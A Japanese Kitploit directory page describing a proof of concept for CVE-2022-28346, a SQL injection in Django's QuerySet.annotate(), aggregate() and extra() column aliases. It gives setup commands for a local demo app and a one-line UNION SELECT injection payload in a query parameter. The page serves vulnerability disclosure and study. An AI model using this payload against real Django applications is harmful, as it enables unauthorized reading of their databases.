Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-28346 — Django 2.2(2.2.28より前)、3.2(3.2.13より前)、および4.0(4.0.4より前)で問題が発見されました。QuerySet.annotate()、aggregate()、およびextra()メソッドは、渡された**kwargsとして(辞書展開を伴う)巧妙に細工された辞書により、列エイリアスでSQLインジェクションの影響を受けます。 | Kitploit
ツール/GitHubGitHub/vincentinttsh/cve-2022-28346
脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用データベースセキュリティ
GitHubvincentinttsh/cve-2022-28346

CVE-2022-28346

Django 2.2(2.2.28より前)、3.2(3.2.13より前)、および4.0(4.0.4より前)で問題が発見されました。QuerySet.annotate()、aggregate()、およびextra()メソッドは、渡された**kwargsとして(辞書展開を伴う)巧妙に細工された辞書により、列エイリアスでSQLインジェクションの影響を受けます。

リポジトリを見る
4年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-28346 PoC Tweet

影響:

  • QuerySet.annotate()、aggregate()、extra() における潜在的なSQLインジェクション。

インストール

root@kitploit:~
poetry install
python manage.py makemigrations
python manage.py migrate
python manage.py loaddata data.json
python manage.py runserver

PoC

root@kitploit:~
?field=poc.title" FROM "poc_blog" union SELECT "-1,",sqlite_version(),"3" --

poc-image

参考文献

CVE Mitre

Django

ツールをダウンロード